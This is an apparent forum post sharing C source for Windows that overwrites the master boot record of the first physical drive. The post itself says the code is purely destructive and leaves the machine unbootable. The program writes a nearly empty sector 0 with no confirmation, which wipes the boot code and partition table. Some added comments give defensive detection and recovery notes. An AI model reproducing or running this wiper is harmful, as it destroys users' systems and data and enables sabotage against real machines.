
破坏MBR的代码

发表于 2017-6-2 13:28:27
这段代码会覆盖MBR,只有破坏作用,会使系统无法启动。
代码来源于网上。




#include <Windows.h>
#include <stdio.h>

// Filler bytes the author calls "shellcode": written casually, their only
// purpose is to replace the real boot code so the system can no longer start.
// The literal holds nine bytes that read as a fragment of 16-bit x86 opcodes,
// plus the string's terminating NUL, so sizeof(scode) is 10.
// NOTE(review): for triage, the fixed leading bytes b8 12 00 cd 10 followed by
// an otherwise zeroed sector ending in 55 aa is the on-disk pattern this
// sample leaves in sector 0.
unsigned char        scode[]=
        "\xb8\x12\x00"
        "\xcd\x10\xbd"
        "\x18\x7c\xb9";

/*
 * Overwrites the first 512-byte sector of \\.\PhysicalDrive0 with a buffer
 * built from scode.
 *
 * The buffer is zero-filled, scode is copied to offset 0, and bytes 510/511
 * are set to the 0x55 0xAA boot-sector signature. Everything in between,
 * including the partition-table area at offsets 446-509, stays zero, so the
 * written sector carries neither usable boot code nor partition entries.
 *
 * Returns -1 (0xFFFFFFFF, because DWORD is unsigned) when the drive cannot be
 * opened, otherwise 0. The results of the two DeviceIoControl calls and of
 * WriteFile are not checked, so 0 does not mean the write happened. The
 * handle is not closed inside this function.
 *
 * Defensive notes:
 *  - Opening a physical drive with write access normally requires an elevated
 *    administrator token, so running users without admin rights blocks this
 *    path.
 *  - A user-mode process opening \\.\PhysicalDriveN with GENERIC_WRITE is
 *    rare outside partitioning, imaging and backup tools and is a useful
 *    signal to alert on in endpoint telemetry.
 *  - NOTE(review): on UEFI/GPT machines the firmware does not execute MBR boot
 *    code and sector 0 holds the protective MBR, so the impact differs by
 *    platform; confirm per system. Recovery depends on boot media and on
 *    partition-layout backups being available offline.
 */
DWORD writeMBR()
{
        DWORD dwBytesReturned;
        BYTE pMBR[512]={0};

        // Copy the replacement bytes into pMBR and append the boot signature.
        memcpy(pMBR, scode, sizeof(scode));
        pMBR[510]=0x55;
        pMBR[511]=0xaa;

        // Open the first physical disk as a raw device for reading and writing.
        HANDLE hDevice = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
        if (hDevice == INVALID_HANDLE_VALUE)
        {
                printf("createfile failed...");
                return -1;
        }

        // Lock the volume; with FSCTL_LOCK_VOLUME several of the parameters
        // below are set to NULL / 0.
        // NOTE(review): hDevice here is a physical-drive handle, while the
        // documentation pasted below describes a volume handle; the call's
        // result is not checked, so this code cannot tell whether a lock was
        // obtained.
        /*Parameters
        hDevice
        A handle to the volume to be locked. To retrieve a device handle, call the CreateFile function.

        dwIoControlCode
        The control code for the operation. Use FSCTL_LOCK_VOLUME for this operation.

        lpInBuffer
        Not used with this operation; set to NULL.

        nInBufferSize
        Not used with this operation; set to zero.

        lpOutBuffer
        Not used with this operation; set to NULL.

        nOutBufferSize
        Not used with this operation; set to zero.

        lpBytesReturned
        A pointer to a variable that receives the size of the data stored in the output buffer, in bytes. */


        DeviceIoControl(hDevice, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &amp;dwBytesReturned, NULL);
        // Write the 512-byte buffer to the device; no seek precedes the call.
        WriteFile(hDevice, pMBR, 512, &amp;dwBytesReturned, NULL);
        DeviceIoControl(hDevice, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &amp;dwBytesReturned, NULL);
        return 0;
}

// Entry point: calls writeMBR() unconditionally. argc/argv are unused, there
// is no prompt or confirmation, and the result of writeMBR() is discarded, so
// the process exits with 0 whether or not the disk was touched.
// NOTE(review): the exit code carries no information for triage; rely on
// process and disk-access telemetry rather than on the program's own status.
int main(int argc, char* argv[])
{
        writeMBR();
        return 0;
}